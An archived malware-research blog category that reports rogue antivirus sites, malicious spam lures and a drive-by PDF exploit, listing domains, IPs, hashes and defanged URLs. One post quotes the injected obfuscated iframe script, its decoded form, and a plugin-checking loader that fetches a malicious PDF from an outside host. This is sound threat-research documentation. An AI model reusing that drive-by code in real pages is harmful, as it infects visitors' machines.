Archive for the 'MalSpam' Category

02
Jun

New rogue domain: hidef-porn-movies.com

By djpnuemo Comments
Categories: Blackhat SEO, Codec, Infection, MalSpam, Malicious Domains, Malware, Malware Distribution, Rogue Security Software and Rogue Software

Another domain found distributing malware codecs and rogue anti-malware programs. The referrer in this case was through y0utybe.com.

Whois entry for hidef-porn-movies.com 91.212.132.11
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676


antispyware-for-all.com
antispyware-systems.com
free-antiviruses.com
free-tube-video-central.net
hidef-porn-movies.com
porn-tube-host.com
virus-analysis.com
xhost-xtubes.com
xmovies-host.com
xtubes-hot-porn.com
xtubes-online.com
xxx-movies-central.com
youporn-online.com

/promo1/ – Fake Adult-Archive.net page
/promo2/ – Fake PornTube page
/promo3/ – Fake scan page
/promo4/ – Fake SexTube page

Whois entry for y0utybe.com 216.195.60.231
Whois Privacy Protection Service
Whois Agent suqkgszqlv@whoisservices.cn
+86.05922577888 fax: +86.05922577111
Xiamen Software Park shengshi Building
xiamen fujian 361005
china

softname.exe
Result: 16/40 (40%)
MD5: aa33e33a6d0a650958c3fa0d1333d9f3
VirusTotal
ThreatExpert Analysis
hxxp://hidef-porn-movies.com/promo2/get.php?aid=1226&vname=softname

19
Nov

Fake Activation and Mailing List Unsubscribe Websites

By mwdisector Comments
Categories: MalSpam and Phishing

In the past few days I’ve seen many websites pop up pretending to be mailing list unsubscription sites.  And per usual, these sites feature legit sounding names like antivirus-activation-code1.org or online-activation-code.info.

Fake unsubscribe

Example screenshot.

STAY AWAY from these because in reality they are being used to collect email addresses likely for future SPAM campaigns.  I also suspect these domains are part of a current fake XP activation SPAM campaign.

Domains involved:

antivirus–activation–code1.org
antivirus–activation-code2.org
antivirus-activation–code1.org
antivirus-activation-code1.org
antivirus-activation-code2.org
antivirus-activation–code.info
antivirus–activation–code.info
new-activation-code.info
new–activation-code.info
online-activation-code.info
online–activation-code.info
online-activation–code.info
online–activation–code.info
pdf-activation-code.info
pdf–activation-code.info
pdf-activation–code.info

IPs associated with these:
66.79.162.82
67.209.140.130

antivirus-activation–code2.org
91.199.50.101

BE ADVISED: These sites may still be active, be careful!

–mwdisector

25
Sep

SpamNuker

By stingner Comments
Categories: Database Update and MalSpam

Note: This site is distributing Rogue “Fake” Anti-Spam Malware product.  Do not visit, pay, or download the software discussed below.

Spam Nuker

Site: hxxp://spamnuker.com/

File: OutlookSpamNukerInstaller.exe
VirusTotal: Result 14/36 (38.89%)

File size: 29280 bytes
MD5…: 463de2ba97b8effef4b72430de51553b
SHA1..: 1eb9f02c925ef27c5e6a1086cb0c6c798c208eaf
SHA256: 7700a3c6a95ed1bb2dfb21567818c7bce55a5d178b28cc9040c528d7045f72eb
SHA512: b52f87db3390ecd2cd5726c3833c07a224d9c718cc8d4a421faef5f66d3f3a26
25d1a92c7bf288f67e4fba9f1fd63c40fd05b76ea85b149d6019a6a17e428bce
PEiD..: -
TrID..: File type identification
Windows Screen Saver (39.4%)
Win32 Executable Generic (25.6%)
Win32 Dynamic Link Library (generic) (22.8%)
Generic Win/DOS Executable (6.0%)
DOS Executable Generic (6.0%)

16
Sep

Virus Response Lab 2009

By stingner Comment
Categories: Database Update, MalSpam, Malicious Domains, Malware, Rogue Security Software and Rogue Software

Note: This site is distributing Rogue “Fake” Anti-Malware product. Do not visit, pay, or download the software discussed below.

Virus response Lab 2009

Site:

* hxxp://viruslabs2009.com/

File: virlab_install.exe
VirusTotal: Result: 9/36 (25%)
File size: 1579973 bytes
MD5…: 93fef280425ad6fb002430abb8cf216d
SHA1..: 766a414faa1e062c0ce40f1ede93a3d166902b6c
SHA256: 4346309f29aacf14cd0fc764ccac674572a498b7f80e1a4018265008cbf1ba4c
SHA512: 371d231b30c32756be1dbd5b50e26144d506abe895a6893fdcea866b8353e310
8548ded05366e25c2d968dffa506880e8729b7b8a6b4f4e06c3814d903eba37e
PEiD..: -
TrID..: File type identification
Win64 Executable Generic (59.6%)
Win32 Executable MS Visual C++ (generic) (26.2%)
Win32 Executable Generic (5.9%)
Win32 Dynamic Link Library (generic) (5.2%)
Generic Win/DOS Executable (1.3%)

MDB: /stingner-malware/

Removal:

Remove this threat with MalwareBytes!

07
Sep

Malspam: Notices from IRS (taxform_for_print.scr)

By djpnuemo Comments
Categories: E-mail, MalSpam, Malicious Links, Malware, Malware Distribution and Social Engineering

Here is a piece of malspam we received that poses to be from the IRS telling you that you are due for a refund. The one we got was from taxinform32@taxreducers.com. Simply follow the steps below and the money is yours! (Proceed at your own risk. File available in /pnuemo-malware/.)

Get Your Refund $1927.10 in Just 3 Easy Steps:
1. Print and fill a short tax interview (click to download)
2. Send it online
3. Receive your tax refund

The link included takes you to the following address and file: hxxp://freepromo.cn/documents/taxform_for_print.scr

taxform_for_print.scr
Result: 7/36 (19.45%)
MD5: a705a1df1fc36f696f0eb0fea72870d3
VirusTotal
ThreatExpert Analysis

31
Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

By djpnuemo Comments
Categories: Database Update, IFRAME, MalSpam, Malicious Links, Malware, Rogue Software and Vulnerabilities

This morning we’ve found a website that automatically loads an infected pdf file.

When the user is directed to the infected site, there is a hidden iframe that loads the pdf file. Here’s what happens…

Links still live, proceed at your own risk.

User visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included

<script language=”javascript”>document.write(unescape(‘%3C%69%66%72
%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E
%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69
%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68
%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69
%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74
%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66
%72%61%6D%65%3E’));</script>

when deobfuscated…

<iframe src=”http://69.46.27.41/afxv/tpv/index.php” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

We can see the hidden iframe above and the page includes the following code…

<script>
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
re=/.d.{2}e.A.{2}o…..l..-.+?([0-9]+.[0-9]+)/;
if(res=re.exec(navigator.plugins[i].description))
{
ppdf=res[1];
}
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
var res;
if(res=re.exec(navigator.plugins[i].description))
{
flash=res[1]+’.'+res[2]+’.'+res[3];
}
}
ppdfenable=0;
if(ppdf!=0)
{
ppdfenable=0;
ppdf=ppdf.replace(/\D/g,”");
if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
if(ppdf[0]<7)ppdfenable=1;if(ppdfenable)
{
document.write(‘<iframe width=1 height=1 src=”hxxp://69.46.27.41/afxv/tpv/gnu.pdf”></iframe>’);
}
}
</script>

Thus leading us to the pdf in question located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. This is also available in /pnuemo-malware/.

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

27
Aug

YouTube Message Malspam

By djpnuemo Comments
Categories: E-mail, MalSpam, Malicious Links and Malware

I received this in my inbox today from YouTube that someone had sent me a message. The URL in the message takes the user through two redirects and then prompts the user to download a file. This files is malware and currently has a low detection rate. Here is the information I’ve gathered. All of the URL’s below are still live so proceed at your own risk.

sshot

hxxp://zz.gd/1d7d6a
-> hxxp://sghghdfgh.actionpooses.com/dfhgfhgfh
–> hxxp://actionpooses.com/livenow/live-now.htm
—> hxxp://212.179.35.9/Free-Girls-Cams-Viewer.exe

Free-Girls-Cams-Viewer.exe
Result: 6/36 (16.67%)
MD5: 716adbf47c6fffbd77604be9e9dd7043
VirusTotal
ThreatExpert Analysis

19
Aug

Britney Spears MalSpam points to mov.exe

By lithium Comments
Categories: E-mail, MalSpam, Malicious Links and Malware

We saw a new MalSpam today. Unfortunately, it shows a very nasty picture of Britney Spears getting out of Paris Hilton’s car. It fowards us to hxxp://www.lenapiel.com/mov.exe, which does not appear to be up at the time of our post.

Warning: The BSD daemon may not appear in the malspam you receive. You have been forewarned.

MalSpam

« Previous Entries
SANDBOX

SANDBOX ANALYSIS PAGE




 

September 2010
M T W T F S S
« Aug    
 12345
6789101112
13141516171819
20212223242526
27282930